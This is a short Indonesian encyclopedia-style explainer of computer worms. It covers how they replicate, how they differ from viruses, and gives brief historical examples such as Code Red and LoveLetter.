Cacing komputer (Inggris: worm) dalam keamanan komputer, adalah sebutan untuk sebuah program yang menyebarkan dirinya di dalam banyak komputer, dengan menggandakan dirinya dalam memori setiap komputer yang terinfeksi. Sebuah worm dapat menggandakan dirinya dalam sebuah sistem komputer sehingga dapat menyebabkan sistem tersebut mengalami crash sehingga mengharuskan server harus di-restart. Beberapa worm juga menghabiskan bandwidth yang tersedia. Worm merupakan evolusi dari virus komputer.

Virus komputer memang dapat menginfeksi berkas-berkas dalam sebuah sistem komputer, tapi worm dapat melakukannya dengan lebih baik. Selain dapat menyebar dalam sebuah sistem, worm juga dapat menyebar ke banyak sistem melalui jaringan yang terhubung dengan sistem yang terinfeksi. Beberapa worm, juga dapat mencakup kode-kode virus yang dapat merusak berkas, mencuri dokumen, e-mail, atau melakukan hal lainnya yang merusak, atau hanya menjadikan sistem terinfeksi tidak berguna.

Beberapa contoh dari worm adalah sebagai berikut:

ADMw0rm: Worm yang dapat melakukan ekspolitasi terhadap layanan jaringan Berkeley Internet Name Domain (BIND), dengan melakukan buffer-overflow.

Code Red: Worm yang dapat melakukan eksploitasi terhadap layanan Internet Information Services (IIS) versi 4 dan versi 5, dengan melakukan serangan buffer-overflow.

LoveLetter: Worm yang menyebar dengan cara mengirimkan dirinya melalui e-mail kepada semua akun yang terdaftar dalam Address Book Microsoft Outlook Express/daftar kontak dalam Microsoft Outlook dengan cara menggunakan kode Visual Basic Script (VBScript).

Nimda

SQL-Slammer




Sumber : berbagai sumber